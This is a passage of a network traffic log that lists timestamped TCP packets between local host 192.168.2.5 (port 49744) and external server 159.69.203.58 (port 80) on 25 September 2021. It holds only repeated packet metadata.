Sep 25, 2021 10:15:04.075606108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075628042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075649023 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075655937 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075659990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075670958 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075691938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075714111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075721025 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075725079 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075737953 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075762033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075778961 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075784922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075784922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075808048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075830936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075839996 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075845003 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075855017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075876951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075879097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075881958 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075901031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075926065 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075927973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075931072 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075954914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075972080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075975895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075977087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076001883 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076004982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076016903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076041937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076044083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076047897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076065063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076066971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076087952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076098919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076107025 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076109886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076132059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076153040 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076153994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076158047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076180935 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076189995 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076215029 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076239109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076241970 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076244116 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076267004 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076283932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076289892 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076301098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076312065 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076313972 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076338053 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076360941 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076385975 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076400042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076406956 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076407909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076435089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076438904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076458931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076476097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076479912 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076483011 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076505899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076519966 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076529980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076539993 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076555014 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076580048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076581001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076584101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076603889 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076627016 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076631069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076639891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076666117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076679945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076683998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076689005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076711893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076728106 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076731920 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076734066 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076757908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076782942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076783895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076787949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076806068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076822042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076827049 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076832056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076858997 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.076877117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076879978 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.076996088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.083039045 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.083236933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.083283901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.083313942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.083337069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.083384991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.083394051 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085259914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085335970 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085479021 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085501909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085524082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085530043 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085546017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085568905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085577965 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085581064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085591078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085617065 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085621119 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085628033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085643053 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085652113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.085692883 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.085696936 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.095541000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095837116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095860958 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095882893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095889091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.095906019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095906019 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.095909119 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.095930099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095933914 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.095952034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095974922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.095978022 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.095983028 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.096019983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.096024036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101093054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101123095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101145983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101167917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101191044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101191998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101208925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101216078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101241112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101258993 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101263046 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101264000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101285934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101309061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101319075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101324081 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101330042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101352930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101373911 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101377010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101382017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101398945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101422071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101442099 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101444006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101447105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101465940 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101488113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101491928 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101495028 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101511002 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101532936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101533890 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101537943 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101555109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101576090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101579905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101581097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101604939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101623058 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101627111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101627111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101649046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101669073 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101671934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101672888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101694107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101715088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101716042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101722002 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101737976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101759911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101763964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101763964 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101788044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101804972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101809978 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101810932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101841927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101861954 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101864100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101866007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101886034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101908922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101913929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101917982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101932049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101948023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101953983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101954937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101977110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.101994038 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101999044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.101999998 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102025032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102035999 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102042913 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102047920 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102070093 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102086067 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102089882 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102092028 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102113008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102128983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102133036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102134943 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102157116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102174044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102179050 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102180004 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102204084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102216959 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102221012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102226973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102248907 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102267981 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102271080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102272987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102293968 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102308989 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102313042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102314949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102338076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102355957 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102360010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102360964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102385998 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102401972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102407932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102408886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102431059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102444887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102448940 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102452993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102474928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102494001 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102495909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102498055 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102518082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102535963 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102540016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102540970 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102566004 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102580070 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102583885 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102590084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102610111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102629900 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102632046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102634907 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102653027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102672100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102674961 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102674961 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.102710962 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.102714062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.105253935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.105279922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.105309010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.105329037 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.105344057 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.105346918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.106050014 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.107633114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107655048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107675076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107692957 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107712030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107729912 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107760906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107789040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107801914 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.107811928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107820988 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.107825994 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.107835054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.107875109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.108016968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.117984056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118010998 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118035078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118056059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118068933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.118082047 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118092060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.118096113 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.118103981 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.118105888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118128061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.118141890 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.118146896 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.118247986 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125591993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125617027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125641108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125664949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125667095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125683069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125685930 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125688076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125711918 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125721931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125731945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125757933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125762939 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125767946 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125782013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125802994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125824928 CEST	80	49744	159.69.203.58	192.168.2.5
